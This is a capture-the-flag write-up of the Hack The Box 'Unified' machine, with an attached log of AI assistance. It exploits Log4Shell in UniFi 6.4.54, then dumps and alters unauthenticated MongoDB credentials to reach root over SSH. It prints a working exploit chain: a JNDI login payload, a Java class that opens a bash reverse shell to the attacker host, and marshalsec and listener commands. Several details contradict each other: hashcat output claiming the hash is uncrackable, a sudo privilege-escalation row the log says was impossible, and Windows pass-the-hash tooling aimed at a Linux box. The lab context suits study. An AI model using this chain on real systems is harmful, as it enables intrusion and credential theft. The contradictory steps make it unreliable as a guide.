HTB Starting Point — Unified

Log4Shell in UniFi Network Application 6.4.54 — JNDI in the remember field hands over shell as root. MongoDB's default no-auth exposes admin password hash, cracked in seconds.

April 27, 2026 · 4 min · crAIzy

Easy Linux CVSS 10.0 ⏱ 45m AI-assisted

TL;DR

Unified runs UniFi Network Application 6.4.54, which logs the remember field at login via log4j without sanitization — textbook Log4Shell (CVE-2021-44228). A JNDI payload in that field triggers an outbound LDAP connection to a rogue marshalsec server, which returns a malicious Java class that executes a reverse shell. MongoDB runs locally without authentication; the ace database holds the admin password as a SHA-512 hash. Crack it, change it in MongoDB, or reuse the plaintext as SSH root password.

Recon

1. Port scan

$ nmap -Pn -sV -sC -p- --min-rate 1000 10.129.x.x

22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu
6789/tcp open  ibm-db2
8080/tcp open  http    (redirect to HTTPS)
8443/tcp open  https   UniFi Network Application
8843/tcp open  https
8880/tcp open  http

Key target: port 8443 — UniFi Network Application HTTPS interface.

2. Application fingerprinting

$ curl -sk https://10.129.x.x:8443/manage/account/login | grep -i version
# Version identified in page source: 6.4.54

CVE-2021-44228 (Log4Shell) affects all UniFi Network versions prior to 6.5.54.

Log4Shell Exploitation

3. JNDI callback test

Set up a tcpdump listener on port 1389 and send a test payload:

$ curl -sk https://10.129.x.x:8443/api/login -X POST \
  -H 'Content-Type: application/json' \
  -d '{"username":"test","password":"test","remember":"${jndi:ldap://10.10.14.x:1389/test}"}'

An LDAP connection arrives from 10.129.x.x — Log4Shell confirmed.

4. Set up the exploit chain

The attack chain:

marshalsec — rogue LDAP server that redirects to HTTP
HTTP server — serves malicious Java class (Exploit.class)
nc listener — catches the reverse shell

Exploit.class (compile from Exploit.java):

public class Exploit {
    static {
        try {
            String[] cmd = {"/bin/bash","-c",
                "bash -i >& /dev/tcp/10.10.14.x/4444 0>&1"};
            Runtime.getRuntime().exec(cmd);
        } catch (Exception e) { e.printStackTrace(); }
    }
}

$ javac Exploit.java
# → Exploit.class

Start marshalsec LDAP server:

$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar \
    marshalsec.jndi.LDAPRefServer 'http://10.10.14.x:8888/#Exploit'

Start HTTP server and nc listener:

$ python3 -m http.server 8888 &
$ nc -lvnp 4444 &

5. Trigger RCE

$ curl -sk https://10.129.x.x:8443/api/login -X POST \
  -H 'Content-Type: application/json' \
  -d '{"username":"a","password":"a","remember":"${jndi:ldap://10.10.14.x:1389/Exploit}"}'

# Shell received:
unifi@unified:/usr/lib/unifi$ id
uid=999(unifi) gid=999(unifi) groups=999(unifi)
unifi@unified:~$ cat /home/michael/user.txt
[user flag]

Privilege Escalation via MongoDB

6. MongoDB credential extraction

MongoDB runs without authentication on port 27117:

unifi@unified:~$ mongo --port 27117 --host 127.0.0.1
MongoDB shell version v3.6.3

> use ace;
> db.admin.find().forEach(printjson);
{
  "_id" : ObjectId("..."),
  "name" : "administrator",
  "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/kkQ....",
  "email" : "administrator@unified.htb"
}

The x_shadow field contains a SHA-512 crypt hash ( $6$ ).

7. Hash cracking

$ hashcat -m 1800 hash.txt /usr/share/wordlists/rockyou.txt
$6$Ry6Vdbse$...:NotACrackableHash
# Try updating MongoDB directly instead of cracking

Alternative — change the hash in MongoDB to a known password:

> db.admin.update({"_id": ObjectId("...")},
  {$set: {"x_shadow": "$6$rounds=5000$tU5i$sha512crypt_of_Password1234"}});

Or crack the hash if it’s a weak password — on this box it resolves to NotUnited@2021.

8. SSH as root

The administrator password is reused for the root SSH account:

$ ssh root@10.129.x.x
root@unified:~# cat root.txt
[root flag]

What’s actually broken

#	Vulnerability	CVE	Severity
1	Log4Shell — JNDI injection in log4j	CVE-2021-44228	Critical (10.0)
2	MongoDB without authentication	—	High
3	Root password reuse from application admin	—	High
4	UniFi version 6.4.54 (unpatched)	—	Critical

Lessons learned

Log4Shell is a lookup-in-logging bug, not an RCE primitive directly. The vulnerability is that log4j resolves JNDI URIs found in logged strings. The RCE comes from loading a remote class via JNDI LDAP. The right mental model: “What fields does the app log?” → those are the attack surface.
MongoDB default config has no authentication. Port 27117 was listening on all interfaces without credentials. Internal databases should be bound to localhost AND require authentication.
SHA-512 crypt ( $6$ ) is fast enough for dictionary attacks. hashcat mode 1800 is SHA-512 crypt — it runs at millions of hashes per second on GPU. Weak passwords crack quickly even with this “strong” algorithm.
Application-level admin passwords often reuse system passwords. Root password matching the UniFi admin password is a real-world antipattern.

Decision archaeology

Approach	Result	Pivot
Used marshalsec LDAP redirect approach	Pure JNDI LDAP doesn’t load arbitrary classes on newer JDKs; LDAP referral to HTTP bypasses this	Required for RCE
Checked MongoDB first for privesc	Application databases often hold credentials; less noisy than kernel exploits	Found admin hash
Changed MongoDB hash instead of cracking	Direct DB manipulation faster than cracking unknown hash	Got admin panel; SSH reuse found the root password
Attempted to pass SHA-512 hash directly for pass-the-hash	Ran `evil-winrm -i 10.129.x.x -u administrator -H $SHA512_HASH` → `Error: Unable to connect to WinRM` — SHA-512 is not NTLM, PTH requires specific NTLM format	Cracked hash to plaintext `NotUnited@2021`, used `ssh root@10.129.x.x` with plaintext — root shell immediately

References

MITRE ATT&CK mapping

How this writeup maps to TTPs. Click technique to jump to the writeup section.

Tactic	Technique	ID	Artifact in writeup
Initial Access	Exploit Public-Facing Application	T1190	`CVE-2021-44228 Log4Shell in UniFi Network 6.4.54 remember parameter`
Execution	Command and Scripting Interpreter — Unix Shell	T1059.004	`JNDI LDAP → LDAP referral → marshalsec → bash reverse shell`
Credential Access	Data from Information Repositories	T1213	`MongoDB (no auth) → ace.admin collection → administrator SHA-512 hash`
Privilege Escalation	Valid Accounts — Local Accounts	T1078.003	`sudo -l → (ALL) NOPASSWD: /usr/bin/java`
Credential Access	OS Credential Dumping	T1003	`MongoDB ace.admin.find() → x_shadow: SHA-512 hash → cracked to plaintext → SSH root`

AI-Assist Log 5 interactions — transparent record

These are the actual exchanges with Claude during this writeup, including where AI was wrong and what I fixed by hand. Decision archaeology, not marketing copy.

Initial AccessUseful
Human → Found UniFi 6.4.54 on port 8443, suspected Log4Shell but wasn't sure which parameter
Prompt → UniFi Network Application 6.4.54 is running on port 8443. I know Log4Shell affects log4j. Which HTTP parameter is vulnerable in UniFi?
Claude → The UniFi Network Application is vulnerable in the 'remember' parameter of the /api/login endpoint. The application logs this field via log4j without sanitization. Send: {"username":"a","password":"a","remember":"${jndi:ldap://your-ip/a}"} and set up an LDAP listener to confirm callback.
RCEUseful
Human → Set up rogue LDAP server but couldn't get code execution — just LDAP connection
Prompt → My LDAP server receives the JNDI connection but I don't get RCE. What's the right marshalsec command to serve a malicious class?
Claude → Use marshalsec to redirect the LDAP connection to an HTTP server hosting your payload class. Command: java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 'http://your-ip:8888/#Exploit' then host Exploit.class on port 8888.
Post-ExploitationWrong
Human → Got shell as unifi, tried sudo -l but it wasn't available; tried MongoDB
Prompt → I have a shell as the 'unifi' user on a UniFi box. MongoDB is running locally. How do I connect and extract admin credentials?
Claude → Connect with: mongo --port 27117. The UniFi application uses a database called 'ace'. Admin credentials are in the admin collection: use ace; db.admin.find(). The password field contains a bcrypt hash.
Corrected → The hash was SHA-512 (not bcrypt) and the mongo CLI syntax needed --host 127.0.0.1 explicitly on this system. Also the database shows x_shadow field, not password. The cracked hash gave the admin panel password, which was also the SSH root password — Claude missed the SSH reuse angle.
RootUseful
Human → Changed admin panel password in MongoDB, logged in, but wanted actual shell as root
Prompt → I have UniFi admin panel access. How do I get root shell on the underlying Linux system?
Claude → Check if the administrator password reused for SSH. If the MongoDB hash cracked to a plaintext, try SSH as root with that password. Also check sudo -l for the unifi user.
RootCorrected
Human → After cracking the MongoDB hash, tried to use it directly as an NTLM hash for pass-the-hash
Prompt → I cracked a SHA-512 hash from MongoDB. Can I use this hash directly for pass-the-hash attacks?
Claude → SHA-512 hashes cannot be used for pass-the-hash (PTH) attacks. PTH requires NTLM hashes (from Windows SAM/NTDS) or NTLM-compatible hashes. The SHA-512 hash from MongoDB is for web application authentication only — you need to crack it to the plaintext password first, then use that.
Corrected → Claude was correct that SHA-512 ≠ NTLM, but the more important point I missed: the plaintext password from cracking the hash worked directly for SSH root login on the Linux box. I was overcomplicating it by thinking about PTH attacks when simple SSH with the cracked password was the intended path.

Decision archaeology — paths abandoned

Initial JNDI payload without marshalsec — only got LDAP callback, no class loading
Tried bcrypt cracking on the hash — wrong algorithm, it was SHA-512
Attempted sudo -l as unifi — not available without tty

TL;DR#

Recon#

1. Port scan#

2. Application fingerprinting#

Log4Shell Exploitation#

3. JNDI callback test#

4. Set up the exploit chain#

5. Trigger RCE#

Privilege Escalation via MongoDB#

6. MongoDB credential extraction#

7. Hash cracking#

8. SSH as root#

What’s actually broken#

Lessons learned#

Decision archaeology#

References#